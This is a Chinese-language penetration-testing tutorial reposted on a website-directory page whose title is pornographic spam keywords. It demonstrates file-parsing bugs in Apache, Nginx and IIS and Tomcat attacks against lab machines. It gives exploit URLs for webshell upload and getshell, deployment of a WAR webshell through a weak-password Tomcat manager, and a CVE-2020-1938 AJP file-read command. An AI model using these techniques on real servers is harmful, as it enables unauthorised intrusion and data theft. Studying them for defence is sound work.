日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

常見組件漏洞

 

常?組件安全

常?組件

操作系統
 windows、linuxWeb 容器 Apache、Tomcat、Nginx、IIS中間件 php、JAVA、Python、perl數據庫 MySQL、Oracle、SQL Server、Access、redis其他組件 phpStudy、Weblogic、JBoss開發框架 s2、thinkphp、vue

關注的問題

1. 組件與漏洞名稱
2. 影響版本3. 漏洞的檢測4. 漏洞的復現5. 漏洞的利?(漏洞場景、?具)6. 修復?案

 

Apache

Apache 解析漏洞

在1.x 和2.x 的版本中。

常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 

上傳png圖片:

常見組件漏洞

 

上傳一句話木馬:

yjh.php

常見組件漏洞

 


常見組件漏洞

 

上傳失敗!

常見組件漏洞

 

修改文件名:

常見組件漏洞

 


常見組件漏洞

 

上傳成功!

常見組件漏洞

 

蟻劍連接:

http://192.168.10.128/upload/yjh.php.wenxin
常見組件漏洞

 


常見組件漏洞

 

getShell成功!

問題原因:

yjh.php.wenxin Apache 會當做PHP ?件來解析。
Apache 從右側向左解析后綴名。
Apache/2.2.25 (Win32) mod_ssl/2.2.25 OpenSSL/0.9.8y PHP/5.2.17

Nginx

Nginx - 空字節漏洞

影響版本:

nginx 0.5.*
nginx 0.6.*
nginx 0.7 <= 0.7.65
nginx 0.8 <= 0.8.37

環境:

常見組件漏洞

 

運行nginx:

常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 

漏洞觸發:

nginx version: nginx/0.7.65
http://192.168.10.128/info.png
http://http://192.168.10.128/info.png%00.php

 

常見組件漏洞

 

Nginx - 解析漏洞

解析圖???

與PHP-CGI 有關 cgi.fix_pathinfo

啟動漏洞環境

常見組件漏洞

 

 Docker-compose up -d

 

192.168.10.130

常見組件漏洞

 

制作圖片木馬:

常見組件漏洞

 


常見組件漏洞

 

上傳:

常見組件漏洞

 

漏洞觸發:

http://192.168.10.130/uploadfiles/6996efdd38b0767328bdfc1bbe7b932f.png/.php

 

常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 

nginx 版本

nginx/1.17.4

 

常見組件漏洞

 

Nginx - ?件路徑解析漏洞 - CVE-2013-4547

影響版本

Nginx 0.8.41 ~ 1.4.3
Nginx 1.5.0 ~ 1.5.7

漏洞環境

登陸docker 環境

漏洞觸發

# 上傳圖???
[1_yjh.jpg ] // .jpg后面有一個空格
http://192.168.16.100:8080/uploadfiles/1_yjh.png
http://192.168.16.100:8080/uploadfiles/1_yjh.png[0x20][0x00].php

 

常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 

其他:

常見組件漏洞

 

IIS

IIS 6.0 解析漏洞

漏洞環境

Windows 2003

// time.asp
<%=time()%>

 

常見組件漏洞

 

分號?件名截斷

time.asp
time.asp;.jpghttp://10.10.10.233:8000/time.asp;.jpg

 

常見組件漏洞

 

*.asp ?錄解析錯誤

time.jpg
/1.asp/time.jpg		//time.asp--->time.jpg
http://10.10.10.233:8000/1.asp/time.jpg

 

常見組件漏洞

 

time.jpg放在1.asp下被當做.asp來解析!

 

IIS 7.0/7.5 解析漏洞

漏洞環境

Windows 2008
IIS+PHP

漏洞的觸發

http://192.168.16.193:8000/index.png
http://192.168.16.193:8000/index.png/.php

 

常見組件漏洞

 

漏洞防護

PHP-CGI
1. cgi.fix_pathinfo = 0
2. 處理映射程序|編輯模塊映射|請求限制|映射|對勾

 

常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 

Tomcat

Tomcat 的安裝與配置

直接解壓

配置環境變量

C:Program FilesJavajdk1.8.0_131
JAVA_HOME:C:Program FilesJavajdk1.8.0_131
Path:%JAVA_HOME%bin;%JAVA_HOME%jrebin;

啟動Tomcat:

C:apache-tomcat-8.5.32bin>startup.bat

 

常見組件漏洞

 

nmap 掃描端?

sudo nmap -A -p- 192.168.10.130

 

常見組件漏洞

 

開啟Tomcat 管理控制臺manager 遠程訪問

/webApps/manager/META-INF/context.xml

 

常見組件漏洞

 

配置管理控制臺賬密

/conf/tomcat-users.xml

 

常見組件漏洞

 

弱?令到GetShell

使? tomcat/tomcat ,登錄 Manager App 。

核?思路:通過管理控制臺部署Web 應?,Web 應?就是后?!

將jsp ?件打包

jar cvf jshell.war jshell.jsp
http://192.168.16.193:8080/jshell/jshell.jsp

大馬:jshell.jsp

常見組件漏洞

 

部署:

常見組件漏洞

 

大馬密碼:

常見組件漏洞

 


常見組件漏洞

 


常見組件漏洞

 

AJP LFI - CVE-2020-1938

2020年1?6?,國家信息安全漏洞共享平臺(CNVD)收錄了Apache Tomcat?件包含漏洞(CNVD-2020-10487,對應CVE-2020-1938)。攻擊者利?該漏洞,可在未授權的情況下遠程讀取特定?錄下的任意?件。

由于Tomcat 默認開啟的AJP 服務(8009 端?)存在?處?件包含缺陷,攻擊者可構造惡意的請求包進??件包含操作,進?讀取受影響Tomcat 服務器上的Web?錄?件。

影響版本

tomcat 6
tomcat 7 < 7.0.100
tomcat 8 < 8.5.51
tomcat 9 < 9.0.31

漏洞利?

./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.16.193 -p 8009 -f WEBINF/web.xml

腳本下載地址:

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
常見組件漏洞

 


常見組件漏洞

 

創建hello.txt,并讀取:

常見組件漏洞

 


常見組件漏洞

 

=== Well Done ===

分享到:
標簽:漏洞
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定